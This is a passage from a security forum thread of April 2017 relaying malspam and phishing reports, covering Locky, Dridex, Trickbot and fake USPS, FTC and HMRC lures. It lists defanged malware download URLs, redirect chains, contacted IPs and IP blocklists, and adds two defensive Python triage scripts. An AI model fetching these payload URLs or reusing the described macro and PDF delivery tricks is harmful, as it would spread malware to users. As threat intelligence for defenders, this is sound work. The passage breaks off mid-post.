Select -any- of the email services and you get:
> https://myonlinesecu...pbox-phish1.png

Then you get sent to a signup page on the genuine dropbox site..."

magioangeles .com: 209.133.208.250: https://www.virustot...50/information/
> https://www.virustot...deda0/analysis/
 


#1911 AplusWebMaster


Posted 16 April 2017 - 09:18 AM

FYI...

Fake 'order proforma invoice' SPAM - delivers 'RAT'
- https://myonlinesecu...ity-link-r-a-t/
16 Apr 2017 - "... -fake- 'Request for 1st new order proforma invoice' -scam- delivers luminosity link Remote Access Tool Trojan* which is being heavily misused...
* http://researchcente...-configuration/

Screenshot: https://myonlinesecu...rma-invoice.png

... The -link-in-the-email-body- goes to
 http ://bit .ly/2oWFVzK which directs to
 http ://www .internationalconfirmation .com/re-direct-live.php which downloads the malware from
 http ://redbulconfirm .host/LIST%20OF%20ORDERS%20FOR%20PROFORMA%20INVOICE .JPG .com...

LIST OF ORDERS FOR PROFORMA INVOICE.JPG .com - Current Virus total detections 16/60*. Payload Security** which is describing it as luminosity link Trojan... The basic rule is NEVER open any attachment -or- link in an email, unless you are expecting it..."
* https://www.virustot...sis/1492341398/

** https://www.reverse....vironmentId=100
Contacted Hosts
192.166.218.230

internationalconfirmation .com: 69.65.33.119: https://www.virustot...19/information/

redbulconfirm .host: 68.65.122.167: https://www.virustot...67/information/
 


#1912 AplusWebMaster


Posted 17 April 2017 - 06:54 AM

FYI...

Fake 'ftc refund' SPAM - leads to malware
- http://blog.dynamoo....ftc-refund.html
17 Apr 2017 - "This -fake- FTC email leads to malware. Curiously, it was sent to a company that received a multimillion dollar FTC -fine- but this is almost definitely a coincidence:
From:    Federal Trade Commission [secretary@ ftccomplaintassistant .com]
Date:    17 April 2017 at 15:25
Subject:    RE: RE: ftc refund
It seems we can claim a refund from the FTC.
Check this out and give me a call.
https ://www .ftc .gov/refunds/company/companyname.com/FTC_refund_recipientname.doc
Thank you
James Newman
Senior Accountant
secretary@ ftccomplaintassistant .com ...


The link-in-the-email actually goes to a URL beginning http ://thecomplete180 .com/view.php?id= followed by a Base 64 encoded string that appears to be 6281 + recipient email address + 5434 ... this downloaded document is up to no good, but the VirusTotal detection rates are only 5/56*. The Word document itself tries to persuade victims to 'enable macros', which would be a -bad- idea:
> https://3.bp.blogspo...0/fake-word.png

* https://www.virustot...sis/1492451191/
Automated analysis [1] [2] shows network traffic:
1] https://malwr.com/an...jE3OTUxNzYwN2I/
Hosts
54.235.135.158
212.116.113.108
186.202.127.62
87.118.126.207


2] https://www.hybrid-a...vironmentId=100
Contacted Hosts (18)

... This gives us a pretty useful minimum blocklist:
"
___

Many PayPal Phish
- https://myonlinesecu...aypal-phishing/
17 Apr 2017 - "... -lots- of phishing attempts for Paypal login account credentials... These definitely do -not- come from a “Trusted Sender”. The spelling and grammar mistakes in the email are more than enough to raise red flags...

Screenshot: https://myonlinesecu...-be-blocked.png

... If you follow-the-link when you use Internet Explorer you start with:
 http : //www .asclepiade .ch/sites/default/files/languages/red.html which -redirects- you to:
 https: //indimedia .co.uk/kasfolio/iceage3overlay/english/pp/
you see a webpage looking like this:
> https://myonlinesecu.../bitchboots.png

BUT if you use Firefox or Google Chrome, then you get:
 http ://www .asclepiade .ch/sites/default/files/languages/red.html which -redirects- you to:
 https ://indimedia .co.uk/kasfolio/iceage3overlay/english/pp/  which -redirects- to:
 https ://indimedia .co.uk/kasfolio/iceage3overlay/english/pp/login?cmd=_signin&dispatch=8b262247e1b6f7c468c785df9&locale=en_GB and gives the typical PayPal phishing page
 (you get a different random dispatch= number each time):
> https://myonlinesecu...ia-pp_phish.png

... Where pressing 'continue' takes you to the usual 'give me your credit card, bank account, address, phone number' and any other information they can think of, to be able to totally steal your identity and all financial accounts..."

indimedia .co.uk: 216.222.194.4: https://www.virustot....4/information/

> https://www.virustot...9184e/analysis/

> https://www.virustot...2b0f8/analysis/

asclepiade .ch: 213.221.153.48: https://www.virustot...48/information/
> https://www.virustot...0830a/analysis/
 

Edited by AplusWebMaster, 17 April 2017 - 03:16 PM.

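Added here as a defender's illustration (not code from the dynamoo post or this thread): the fake-FTC lure's view.php?id= value is the Base64 of 6281 + recipient address + 5434, so anyone holding web proxy logs can decode it to see exactly which mailboxes received the lure. The host name is the one in the report; the log lines, client addresses and recipient addresses are constructed.

```python
"""Decode the fake-FTC lure id from proxy logs to find targeted recipients."""
import base64
import re
from urllib.parse import parse_qs, quote, urlsplit

SUSPECT_HOST = "thecomplete180.com"   # host named in the dynamoo report
# Decoded id reads 6281 + recipient email + 5434 (per the report).
ID_PATTERN = re.compile(r"^6281(?P<email>\S+@\S+?)5434$")


def _sample_id(email: str) -> str:
    """Build a lure id the way the report describes; sample data only."""
    return quote(base64.b64encode(f"6281{email}5434".encode()).decode(), safe="")


# Constructed sample log lines: <epoch> <client_ip> <method> <url>
SAMPLE_LOG = "\n".join([
    f"1492451191.101 10.0.0.5 GET http://{SUSPECT_HOST}/view.php?id={_sample_id('alice@example.com')}",
    "1492451191.202 10.0.0.6 GET http://www.example.org/index.html",
    f"1492451191.303 10.0.0.7 GET http://{SUSPECT_HOST}/view.php?id=not-base64!!",
    f"1492451191.404 10.0.0.8 GET http://{SUSPECT_HOST}/view.php?id={_sample_id('bob@example.net')}",
])


def decode_lure_id(raw: str):
    """Return the recipient address embedded in a lure id, or None.

    Handles ids that were logged unencoded: a '+' in Base64 arrives here as a
    space after query parsing, so retry with spaces turned back into '+'.
    """
    for candidate in (raw, raw.replace(" ", "+")):
        try:
            text = base64.b64decode(candidate, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
            continue
        m = ID_PATTERN.match(text)
        if m:
            return m.group("email")
    return None


def find_lure_hits(log_text: str):
    """Scan log lines and return [(client_ip, recipient_email), ...]."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        client_ip, url = parts[1], parts[3]
        u = urlsplit(url)
        if u.hostname != SUSPECT_HOST or not u.path.endswith("/view.php"):
            continue
        for raw_id in parse_qs(u.query).get("id", []):
            email = decode_lure_id(raw_id)
            if email:
                hits.append((client_ip, email))
    return hits


if __name__ == "__main__":
    for ip, who in find_lure_hits(SAMPLE_LOG):
        print(f"{ip} fetched the lure addressed to {who}")
```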

#1913 AplusWebMaster


Posted 18 April 2017 - 01:26 PM

FYI...

'Protected View Mode' for MS Word docs
> https://www.askwoody...uge-of-malware/
April 17, 2017 - "... 'Protected View Mode' is enabled by default in Word 2010 and later, but Word 2007 and earlier -don’t- have Protected View... See screenshot:
> https://www.askwoody...view-768x45.jpg
If you click 'Enable Editing', the malware fires automatically — you don’t need to do anything more.
If you open an attached DOC from Gmail, it’s harmless, -unless- you download the file, -then- open the DOC in Word and -then- click 'Enable Editing'. Moral of the story: Use Gmail*. Failing that, don’t click 'Enable Editing'..."
* https://mail.google.com/mail/#inbox

>> https://www.howtogee...t-being-hacked/
April 13, 2017
 

Edited by AplusWebMaster, 18 April 2017 - 01:34 PM.


#1914 AplusWebMaster


Posted 19 April 2017 - 04:21 AM

FYI...

Fake 'USPS' SPAM - delivers Zbot via fake Word online sites
- https://myonlinesecu...d-online-sites/
19 Apr 2017 - "... Today they have changed slightly again and now just have a link-to-a-site where you download a single executable file that pretends to be a plugin that allows you to read the documents online. Today (so far) are all Zbot/Panda Banking Trojans
 plugin_office_update_KB093211.exe (VirusTotal 7/61*) | Payload Security**...
* https://www.virustot...sis/1492568116/

** https://www.hybrid-a...vironmentId=100

Typical senders imitating USPS include:
    USPS Ground Support <zmesat742@ hetaudabazar .com>
    USPS Support Management <cykobezr0@ okamacr .com>
    USPS TechConnect <oysvuadv78382@ thewons .com>
    USPS Delivery <yrok10507057@ taviexport .com>
    USPS Support Management <gywer6@ nicolasprioux .com>
    USPS TechConnect <kapifa78036@ hashmkt .com>
    USPS Home Delivery <vyfhob22148305@ seedtech .co.in>
    USPS Priority Parcels <lameipgo65@ mtpub .com>
    USPS Priority <yhqez882670@ affection .org>

There are a multitude of different subjects. Some of the ones I received today are:
    WARNING: TROUBLE WITH YOUR ITEM
    ATTENTION REQUIRED: DETAILS ABOUT A IMPENDING REFUND
    URGENT USPS MONEYBACK INFORMATION CONCERNING YOUR PARCEL
    WARNING: you’re legally obliged to review the status of your parcel
    URGENT: notification of delay of your parcel
    Official letter concerning your order
    Major problems reported to the USPS customer support
    WARNING: INFORMATION ON YOUR IMPENDING REFUND
    IMMEDIATE ACTION REQUIRED: your shipment’s been postponed
    URGENT USPS MONEYBACK INFO CONCERNING YOUR SHIPMENT
    AUTOMATED letter regarding your shipment’s location
    OFFICIAL USPS REFUND INFO
    Official notice from USPS
    WARNING: ISSUES WITH YOUR SHIPMENT
    USPS USER URGENT NEW INFO CONCERNING YOUR PACKAGE
    WARNING: PROBLEMS WITH YOUR ORDER
    OFFICIAL USPS system statement
    USPS official notice: major trouble with your parcel
    USPS customer support team notice: your shipment has been postponed


Screenshots: https://myonlinesecu...USPS-email1.png

> https://myonlinesecu...USPS-email2.png

> https://myonlinesecu...USPS-email3.png

All have links-in-the-email body to a -fake- word online website and you are invited to download the latest plugin version to read the documents online:
> https://myonlinesecu...line-plugin.png

... The basic rule is NEVER open any attachment (or -link-) in an email, unless you are expecting it..."
___

Fake 'invoice' SPAM - delivers Dridex
- https://myonlinesecu...banking-trojan/
19 Apr 2017 - "An email with the subject of 'Copy of your 123-reg invoice (123-230044839)' [random numbers] pretending to come from no-reply@ 123-reg .co.uk with a malicious pdf attachment that contains an embedded word doc delivers Dridex banking Trojan...

Screenshot: https://myonlinesecu...ake-invoice.png

123-230044839-reg-invoice.pdf - Current Virus total detections 10/57*. Payload Security** shows a download from
 http ://jeanevermore .com/6gfd43 that is converted by the macro to redchip2.exe (VirusTotal 10/61***)...
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1492601252/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
216.117.150.240
216.177.132.93
152.66.249.132
85.214.113.207
192.184.84.119


*** https://www.virustot...sis/1492594268/

- http://blog.dynamoo....ur-123-reg.html
19 Apr 2017 - "This -fake- financial spam does not come from 123-Reg (nor is it sent to 123-Reg customers). It has a malicious attachment.
    From     no-reply@ 123-reg .co.uk
    Date     Wed, 19 Apr 2017 17:19:51 +0500
    Subject     Copy of your 123-reg invoice ( 123-093702027 )
    Hi [redacted],
    Thank you for your order.
    Please find attached to this email a receipt for this payment.
    Help and support
    If you are still stuck why not contact our support team? Simply visit our 123-reg
    Support Centre and click on the Ask a Question tab.
    Thank you for choosing 123-reg.
    The 123-reg team...

 
The invoice number is randomly generated. The attachment is a PDF file with a name matching the invoice number (e.g. 123-093702027-reg-invoice.pdf). This PDF file appears to drop an Office document according to VirusTotal results 12/56*. Hybrid Analysis** shows the document dropping a malicious executable with a detection rate of 15/61***. It appears to contact the following IPs (some of which contain legitimate sites):
216.87.186.15 (Affinity Internet, US)
216.177.132.93 (Alentus Corporation, US)
152.66.249.132 (Budapest University of Technology and Economics, Budapest)
85.214.113.207 (Strato AG, Germany)
192.184.84.119 (RamNode LLC, US)
The general prognosis seems to be that this is dropping the Dridex banking trojan.
Recommended blocklist:
216.87.186.15
216.177.132.93
152.66.249.132
85.214.113.207
192.184.84.119
"
* https://virustotal.c...sis/1492608695/

** https://www.hybrid-a...vironmentId=100

*** https://www.virustot...47872/analysis/
___

Malicious Excel Sheets...
- https://isc.sans.edu...l?storyid=22322
2017-04-19 - "... found a malicious Excel sheet which contained a VBA macro. One particularity of this file was that useful information was stored in cells. The VBA macro read and used them to download the malicious PE file. The Excel file looked classic, asking the user to enable macros:
> https://isc.sans.edu...images/xls1.png
... the macro was, as usual, to download the malicious PE file, to store it on the disk and to execute it. The PE file has a VT score of 10/60[1]. This is not the first time that I saw this way of passing data to the macro. It’s easy to configure campaigns with many URLs and samples without touching the macro. I had a bunch of 400 malicious Excel sheets to inspect... bad guys also use data stored in the document itself and access it from the VBA code. I also saw a few times white text on white background in Word documents..."
(More detail at the isc URL above.)
1] https://www.virustot...sis/1491843226/
 

Edited by AplusWebMaster, 19 April 2017 - 01:51 PM.

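Added example for the ISC diary item above (not the diary's own code, not part of this thread): when the VBA macro is a generic downloader that reads its URL and drop-file name from worksheet cells, triage can skip the macro and simply list cell strings of any workbook that carries a vbaProject.bin. The workbook is constructed in memory with only the parts the parser reads (sharedStrings, one sheet, an empty vbaProject.bin); the URL and file name in it are placeholders.

```python
"""List URL- and executable-like cell values in a macro-enabled workbook."""
import io
import re
import xml.etree.ElementTree as ET
import zipfile

NS = {"m": "http://schemas.openxmlformats.org/spreadsheetml/2006/main"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
EXE_RE = re.compile(r"\b[\w.-]+\.(?:exe|scr|dll|js|vbs|ps1)\b", re.I)


def build_sample_xlsm() -> bytes:
    """Constructed workbook: a shared-string URL in A1, an inline-string
    file name in B1, a number in C1, harmless text in A2, plus an empty
    vbaProject.bin so it counts as macro-enabled (placeholder values only)."""
    shared = ('<sst xmlns="%s"><si><t>http://example.invalid/payload/x</t></si></sst>'
              % NS["m"])
    sheet = ('<worksheet xmlns="%s"><sheetData>'
             '<row r="1"><c r="A1" t="s"><v>0</v></c>'
             '<c r="B1" t="inlineStr"><is><t>update.exe</t></is></c>'
             '<c r="C1"><v>42</v></c></row>'
             '<row r="2"><c r="A2" t="inlineStr"><is><t>Quarterly figures</t></is></c></row>'
             '</sheetData></worksheet>' % NS["m"])
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("xl/sharedStrings.xml", shared)
        z.writestr("xl/worksheets/sheet1.xml", sheet)
        z.writestr("xl/vbaProject.bin", b"")   # presence alone marks it macro-enabled
    return buf.getvalue()


def extract_cells(xlsx: bytes):
    """Return (has_vba, [(sheet_part, cell_ref, text), ...]) for all cells."""
    t_tag = "{%s}t" % NS["m"]
    with zipfile.ZipFile(io.BytesIO(xlsx)) as z:
        parts = z.namelist()
        shared = []
        if "xl/sharedStrings.xml" in parts:
            root = ET.fromstring(z.read("xl/sharedStrings.xml"))
            for si in root.findall("m:si", NS):
                shared.append("".join(t.text or "" for t in si.iter(t_tag)))
        cells = []
        for name in sorted(parts):
            if not name.startswith("xl/worksheets/sheet"):
                continue
            root = ET.fromstring(z.read(name))
            for c in root.iter("{%s}c" % NS["m"]):
                kind = c.get("t")
                if kind == "s":                       # shared-string index
                    v = c.find("m:v", NS)
                    text = shared[int(v.text)] if v is not None else ""
                elif kind == "inlineStr":             # string stored in the cell
                    text = "".join(t.text or "" for t in c.iter(t_tag))
                else:                                 # number / formula result
                    v = c.find("m:v", NS)
                    text = v.text if v is not None else ""
                cells.append((name, c.get("r"), text))
    return "xl/vbaProject.bin" in parts, cells


def triage_workbook(xlsx: bytes) -> dict:
    """Flag macro-enabled workbooks whose cells hold URLs or program names."""
    has_vba, cells = extract_cells(xlsx)
    urls = [(ref, txt) for _, ref, txt in cells if URL_RE.search(txt)]
    exes = [(ref, txt) for _, ref, txt in cells if EXE_RE.search(txt)]
    return {"has_vba": has_vba, "urls": urls, "executables": exes,
            "suspicious": has_vba and bool(urls or exes)}


if __name__ == "__main__":
    print(triage_workbook(build_sample_xlsm()))
```

The parser deliberately ignores cell styling, so white-on-white text (the Word trick mentioned in the same diary) is listed like any other cell.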

#1915 AplusWebMaster


Posted 20 April 2017 - 09:32 AM

FYI...

Malvertising campaign - drops ISFB banking Trojan
- https://blog.malware...banking-trojan/
April 20, 2017 - "We have been witnessing a series of malvertising attacks that keep a low profile with decoy websites and strong IP address filtering... There have been similar uses of -fake- façades as a gateway to exploit kits. For instance, Magnitude EK is known to use gates that have to do with Bitcoin, investment websites and such, as detailed in this Proofpoint blog entry*...
* https://www.proofpoi...heme-windows-10
... In this particular case, the threat actor stole the web template from “Capital World Option“, a company that provides a platform for trading binary options. Participants must predict whether the price of an asset will rise or fall within a given time frame, which defines whether or not they will make money. Binary options have earned a bad reputation though and some countries have even banned them. Below is a screenshot of the legitimate website that is being impersonated. There are some differences between the real one and the fakes; the former is using SSL and was registered a while ago. Also, some of the website functionality is not working properly with the decoy versions.
Legitimate site: https://blog.malware...17/04/real2.png
---
Decoy site that ripped all the branding: https://blog.malware...017/04/fake.png
---
Those -fake- sites are only meant to be viewed if you are not a target of this particular malware campaign. In other words, if you load the infection chain from the malvertising call and see the site, you will not be infected. Infections happen when the fraudulent server forwards victims directly to a second gate, without showing them any of the site’s content. The same threat actor has registered -many- different domains all purporting to be lookalikes using a similar naming convention...
Conclusion: This particular campaign focused on a very specific malvertising chain leading to the RIG exploit kit and – as far as we could tell – dropping the same payload each time, no matter the geolocation of the victim. Banking -Trojans- have been a little bit forgotten about these days as they are overshadowed by ransomware. However, they still represent a significant threat and actually do operate safely in the shadows, manipulating banking portals to perform -wire-transfers- unbeknownst to their victims or even the banks they are targeting...
IOCs: ...
‘Binary options’ IP addresses:
..."
(More detail at the malwarebytes URL at the top.)
 


#1916 AplusWebMaster


Posted 21 April 2017 - 10:35 AM

FYI...

Fake 'Payment Receipt' SPAM - delivers Locky
- https://myonlinesecu...ceipts-malspam/
21 Apr 2017 - "... an email with the subject of 'Payment Receipt 2724' or something similar pretending to come from random companies with a pdf attachment containing an embedded malicious word macro enabled doc which will download an encrypted txt file that is -transformed- into the Locky ransomware file redchip2.exe... Some of the subjects include (all have random numbers):
    Receipt 435
    Payment Receipt 2724
    Payment-2677
    Payment Receipt_739
    Payment#229


Screenshot: https://myonlinesecu...ent-Receipt.png

P2724.pdf - Current Virus total detections 9/57*. Payload Security** shows it drops an embedded macro enabled word doc (VirusTotal 12/59***) ... which downloads from
 sherwoodbusiness .com/9yg65 which is an encrypted-text-file that is converted-by-the-macro to redchip2.exe
(Payload Security[4] (VirusTotal 6/62[5]). There are loads of other download locations for the encrypted txt file... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1492775465/

** https://www.reverse....vironmentId=100
Contacted Hosts
216.117.141.38

*** https://www.virustot...sis/1492775793/

4] https://www.reverse....vironmentId=100

5] https://www.virustot...sis/1492775821/
redchip2.exe

sherwoodbusiness .com: 216.117.141.38: https://www.virustot...38/information/
> https://www.virustot...2a0d3/analysis/

Embedded docs in PDF files can infect you
> https://myonlinesecu...ily-infect-you/
22 Apr 2017
 

Edited by AplusWebMaster, 22 April 2017 - 06:33 AM.


#1917 AplusWebMaster


Posted 24 April 2017 - 06:29 AM

FYI...

Fake 'Scan Data' SPAM - delivers Locky
- https://myonlinesecu...acro-word-docs/
24 Apr 2017 - "... another mass malspam onslaught with 2 separate emails with the subject of 'Scan Data' or '12345678.pdf' (random numbers) pretending to come from random email addresses at your-own-email-domain with a PDF attachment that contains an embedded malicious word doc with macros that delivers Locky ransomware... See HERE[1] for safe settings to stop these from working...
1] https://myonlinesecu...ily-infect-you/

Screenshot: https://myonlinesecu...-data-locky.png

Scan_066379.pdf - Current Virus total detections 13/55*. Payload Security** - drops 744951.doc
 (Virustotal 12/57***) - (Payload Security[4]) shows a download from
 http ://dorsetcountymaintenance .co.uk/87tgyu which is converted by the macro to redchip2.exe
(VirusTotal 10/59[5]) (Payload Security [6])... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1493033052/

** https://www.reverse....vironmentId=100
Contacted Hosts
188.65.115.102

*** https://www.virustot...sis/1493033505/

4] https://www.hybrid-a...vironmentId=100
Contacted Hosts
188.65.115.102

5] https://www.virustot...sis/1493034283/
redchip2.exe

6] https://www.hybrid-a...vironmentId=100

dorsetcountymaintenance .co.uk: 188.65.115.102: https://www.virustot...02/information/
> https://www.virustot...24a1e/analysis/
___

Locky ransomware comeback - Necurs botnet
- https://www.helpnets...4/locky-necurs/
April 24, 2017 - "The Necurs botnet has, once again, begun pushing Locky ransomware on unsuspecting victims:
> https://www.helpnets...ecurs-locky.jpg
The botnet, which flip-flops from sending penny stock pump-and-dump emails to booby-trapped files that lead to malware (usually Locky or Dridex), has been spotted slinging thousands upon thousands of emails in the last three or four days*...
* http://blog.talosint...rns-necurs.html
... In the first part of the spam campaign, the emails contain no text except in the Subject line, which simply says 'Receipt' or 'Payment', followed by random numbers. Those numbers are seen again in the name of the attached PDF file... Later, the emails were made to look like they contained a scanned image in PDF format... In both cases, the attached PDF contains embedded Word documents with macros... there is currently no way to decrypt the files without paying the ransom..."

- https://isc.sans.edu...l?storyid=22334
2017-04-23 - "... The PDF contains JavaScript to extract the malicious Word document and launch Word. The user is prompted before this action takes place, but if you want to mitigate this, you can -disable- JavaScript. If you use Adobe Reader version 15.009.20069 or later, then the extracted Word document is marked with a mark-of-web, regardless if the containing PDF document is marked as such:
> https://isc.sans.edu...2304-014929.png
... After applying Microsoft's patch for CVE-2017-0199, a downloaded HTA is no longer executed, but it is -still- downloaded without user interaction..."

Cisco - Threat Outbreak Alerts
> https://tools.cisco....ting.x#~Threats
April 24, 2017 - Email Messages Distributing Malicious Software...

Locky has reemerged - borrowing attack techniques from Dridex
- http://www.zdnet.com...kier-than-ever/
April 24, 2017
___

Interpol finds nearly 9,000 infected servers in SE Asia
- http://www.reuters.c...r-idUSKBN17Q1BT
Apr 24, 2017 - "An anti-cybercrime operation by Interpol and investigators from seven southeast Asian nations revealed nearly 9,000 malware-laden servers and hundreds of compromised websites in the ASEAN region, Interpol said on Monday. Various types of malware, such as that targeting financial institutions, spreading ransomware, launching Distributed Denial of Service (DDoS) attacks and distributing spam were among the threats posed by the infected servers, the operation showed... Experts from seven private firms also participated in the operation run out of the Singapore-based Interpol Global Complex for Innovation (IGCI), with China providing some cyber intelligence, the international police body said on its website*...
* https://www.interpol.../2017/N2017-051
DDoS attacks have always been among the most common on the Internet, making use of hijacked and virus-infected computers to target websites until they can no longer cope with the scale of data requested. The operation also identified nearly 270 websites infected with a malware code, among them several government websites that may have contained citizens' personal data, Interpol added..."
 

Edited by AplusWebMaster, 24 April 2017 - 02:50 PM.


#1918 AplusWebMaster


Posted 25 April 2017 - 05:06 AM

FYI...

Fake 'confirmation' SPAM - delivers Locky
- https://myonlinesecu...acro-word-docs/
25 Apr 2017 - "... another 2 mass malspam onslaughts with different email subjects. The first is 'confirmation_12345678.pdf' (random numbers) pretending to come from info@ random .tld with a PDF attachment that contains an embedded malicious word doc with macros that delivers Locky ransomware. The second is a -blank- email with the subject of 'paper', coming from random names, companies and email addresses. In all cases the alleged sending address is -spoofed- ... In both campaigns the PDF appears totally to be a -blank- page but still contains the embedded macro word doc that will infect you when opened. These macro enabled word docs embedded into PDF files can easily infect you, -IF- you have default PDF settings set in Adobe Reader. See HERE[1] for safe settings to stop these working...
1] https://myonlinesecu...ily-infect-you/
... 2 distinct malspam approaches today. First coming from 'scanner' (or other MFD, like scan, Epson, Printer, canon etc ) @ your-own-email-domain with a subject of 'scan data'. The second comes from totally random names @ your-own-email-domain with a subject of '12345678.pdf' (random numbers) and has a completely -empty- email body...

Screenshot1: https://myonlinesecu...onfirmation.png

Screenshot2: https://myonlinesecu...locky_paper.png

6446165b2.pdf - Current Virus total detections 13/56*. Payload Security** drops 216616.docm, which downloads from
 http ://parallelsolutions .nl/jhg67g  which is converted by the macro to pitupi2.exe
(VirusTotal 23/59***) (Payload Security[4])... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1493096091/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
159.253.0.19

*** https://www.virustot...sis/1493096408/
pitupi2.exe

4] https://www.hybrid-a...vironmentId=100

parallelsolutions .nl: 159.253.0.19: https://www.virustot...19/information/
> https://www.virustot...8c163/analysis/
___

Phish attacks responsible for 3/4 of all malware
- https://www.helpnets...ttacks-malware/
April 25, 2017 - "With phishing now widely used as a mechanism for distributing ransomware, a new NTT Security reveals that 77% of all detected ransomware globally was in four main sectors – business & professional services (28%), government (19%), health care (15%) and retail (15%):
> https://www.helpnets...ty-042017-2.jpg
While technical attacks on the newest vulnerabilities tend to dominate the media, many attacks rely on less technical means. According to the GTIR, phishing attacks were responsible for nearly three-quarters (73%) of all malware delivered to organizations, with government (65%) and business & professional services (25%) as the industry sectors most likely to be attacked at a global level. When it comes to attacks by country, the U.S. (41%), Netherlands (38%) and France (5%) were the top three sources of phishing attacks. The report also reveals that just 25 passwords accounted for nearly 33% of all authentication attempts against NTT Security honeypots last year. Over 76% of log on attempts included a password known to be implemented in the Mirai botnet – a botnet comprised of IoT devices, which was used to conduct, what were at the time, the largest ever distributed denial of service (DDoS) attacks. DDoS attacks represented less than 6% of attacks globally, but accounted for over 16% of all attacks from Asia and 23% of all attacks from Australia. Finance was the most commonly attacked industry globally, subject to 14% of all attacks. The finance sector was the only sector to appear in the top three across all of the geographic regions analysed, while manufacturing appeared in the top three in five of the six regions. Finance (14%), government (14%) and manufacturing (13%) were the top three most commonly attacked industry sectors:
> https://www.helpnets...ty-042017-1.jpg
... NTT Security summarizes data from over 3.5 -trillion- logs and 6.2 -billion- attacks for the 2017 Global Threat Intelligence Report (GTIR)*..."
* https://www.nttcomse...m/us/gtir-2017/
___

Phish: PayPal Credit Service Security Check
- https://security.int...-security-check
24 April 2017 - "People are reporting receiving -fake- emails as found below. Please be aware that the From address as well as the Subject line may change; however, the content with in the body of the email will stay the same with the exception of a change to the malicious URL link, which may have many different variations. Below is an example of the email people are receiving:
> https://security.int...24_14-51-41.png
... end of the -fake- email..."
 

Edited by AplusWebMaster, 25 April 2017 - 08:21 AM.


#1919 AplusWebMaster


Posted 26 April 2017 - 05:24 AM

FYI...

Fake 'DHL' SPAM - delivers js malware
- https://myonlinesecu...nknown-malware/
26 Apr 2017 - "... email with the subject of 'DHL Shipment Notification: 1104749373' pretending to come from DHL Customer Support <support@ dhl .com>  with a semi-random named zip attachment in the format of Pickup EXPRESS.Date2017-04-26.zip which delivers or tries to deliver some sort of malware...

Screenshot: https://myonlinesecu...-1104749373.png

Pickup EXPRESS.Date2017-04-26.zip: Extracts to: Pickup DOMESTIC EXPRESS Date2017-04-26.pdf.js
Current Virus total detections 4/57*. Payload Security**  | JoeSandbox*** all of which do show a connection to 47.91.74.140 80 horcor .com which looks to be connected to or hosted by Chinese online company Alibaba.
Payload Security shows an attempt to contact http ://horcor .com/gate.php?ff1 (ff1 – ff12) in turn via get requests BUT only when you expand the wscript.exe section and examine the script calls... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1493200305/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
47.91.74.140

*** https://jbxcloud.joe...s/259442/1/html

horcor .com: 47.91.74.140: https://www.virustot...40/information/
___

JavaScript Malspam Campaigns
Multiple malicious JavaScript spam campaigns active in the wild
- https://www.zscaler....lspam-campaigns
April 25, 2017 - "... multiple active malspam campaigns with links to malicious JavaScript payloads in the wild. These JavaScript files when opened by the end user will trigger download and execution of malware executables belonging to various Dropper and Backdoor Trojan families. We have seen over 10,000 instances of malicious JavaScript payloads from these campaigns in the last two weeks. The JavaScript files are highly obfuscated to avoid detection and on first look share similarity to Angler EK's landing page. Two URL formats are commonly being used at this time, one with just alphanumeric characters in path and the other with string ‘.view’ in the path. The examples for these URLs are seen below:
http ://yountstreetglass [.]com/TRucDEpdoO4jsaFaF4wCTxl8h/
http ://unbunt [.]com/view-report-invoice-0000093/w0ru-bb26-w.view/
The javascript files have names which try to masquerade as bills and receipts of various services like DHL, UPS and Vodafone to name a few... When we opened the JavaScript, we observed that it was heavily obfuscated with random strings and numbers assigned to variables, which makes very little sense...
Conclusion: We should always be cautious when clicking on links or handling e-mail attachments received from an unknown sender. Threat actors keep changing their obfuscation techniques in an attempt to evade detection methods used by security engines. It is increasingly important to have multiple security layers to block these kinds of attacks..."
(More detail at the zscaler URL above.)

yountstreetglass .com: 107.180.2.25: https://www.virustot...25/information/
> https://www.virustot...364d9/analysis/

unbunt .com: 5.153.24.46: https://www.virustot...46/information/
> https://www.virustot...a3e79/analysis/
 



Edited by AplusWebMaster, 26 April 2017 - 07:16 AM.


#1920 AplusWebMaster

Posted 28 April 2017 - 07:38 AM

FYI...

Fake 'Secure email' SPAM - delivers Trickbot
- https://myonlinesecu...malspam-emails/
28 Apr 2017 - "An email with the subject of 'Secure email communication' pretending to come from HM Revenue & Customs <GSRPCommunication@ govsecure .co.uk> with a malicious word doc attachment... delivering Trickbot banking Trojan... criminals sending these have registered various domains that look like genuine HMRC domains... So far we have found
    govsecure .co.uk
    gov-secure .co.uk
... they are registered via Godaddy as registrar and the emails are sent via City Network Hosting AB Sweden 89.46.82.3, 89.46.82.2, 89.42.141.46, 89.40.217.178, 89.40.217.179, 89.40.217.185 ...

Screenshot: https://myonlinesecu...mmunication.png

Unsuccessful_Payments_Documents.doc - Current Virus total detections 3/56*. Payload Security** shows a download via powershell from http ://elevationstairs .ca/fonts/60c5776c175c54d2.png which of course is -not- an image file but a renamed .exe (VirusTotal 8/61***) (Payload Security [4])... This email attachment contains what appears to be a genuine word doc or Excel XLS spreadsheet with either a macro script or an embedded OLE object that when run will infect you... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1493381297/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
70.33.246.140
107.22.214.64
184.160.113.13
217.31.111.153


*** https://www.virustot...sis/1493382383/

4] https://www.hybrid-a...vironmentId=100

elevationstairs .ca: 70.33.246.140: https://www.virustot...40/information/
> https://www.virustot...2c048/analysis/
___

Intrusions - Multiple Victims across Multiple Sectors
- https://www.us-cert....lerts/TA17-117A
April 27, 2017 - "... Overview:
